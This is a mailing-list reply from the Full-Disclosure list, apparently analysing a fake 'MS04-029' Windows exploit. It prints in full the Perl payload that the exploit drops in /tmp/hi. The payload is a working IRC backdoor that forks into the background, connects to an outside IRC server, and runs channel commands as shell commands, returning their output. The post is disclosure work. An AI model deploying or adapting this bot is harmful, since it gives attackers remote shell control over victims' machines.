[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
From: Brendan Dolan-Gavitt <mooyix@xxxxxxxxx>
Date: Wed, 3 Nov 2004 22:58:54 -0500

Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.

#!/usr/bin/perl
$chan      = "#0x";
$nick      = "k";
$server    = "ir3ip.net";
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET->new( $server . ":6667" ) || exit;
print $sock "USER k +i k :kv1\nNICK k\n";
$i = 1;

while ( <$sock> =~ /^[^ ]+ ([^ ]+) / ) {
    $mode = $1;
    last if $mode == "001";
    if ( $mode == "433" ) {
        $i++;
        $nick =~ s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}
print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";
while (<$sock>) {
    if (/^PING (.*)$/) { print $sock "PONG $1\nJOIN $chan\n"; }
    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_ = `$_`;
        foreach ( split "\n" ) { print $sock "PRIVMSG $chan :$_\n"; sleep 1; }
    }
}    #/tmp/hi/tmp/hi

Follow-Ups:
- Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
  - From: Rodrigo Barbosa

References:
- [Full-Disclosure] New Remote Windows Exploit (MS04-029)
  - From: Max Load
- Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
  - From: Heikki Toivonen

Prev by Date: RE: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Next by Date: [Full-Disclosure] Re: CSS in E-Mails possible E-Mail-Validity Check for Spammers?
Previous by thread: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Next by thread: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
Index(es):
- Date
- Thread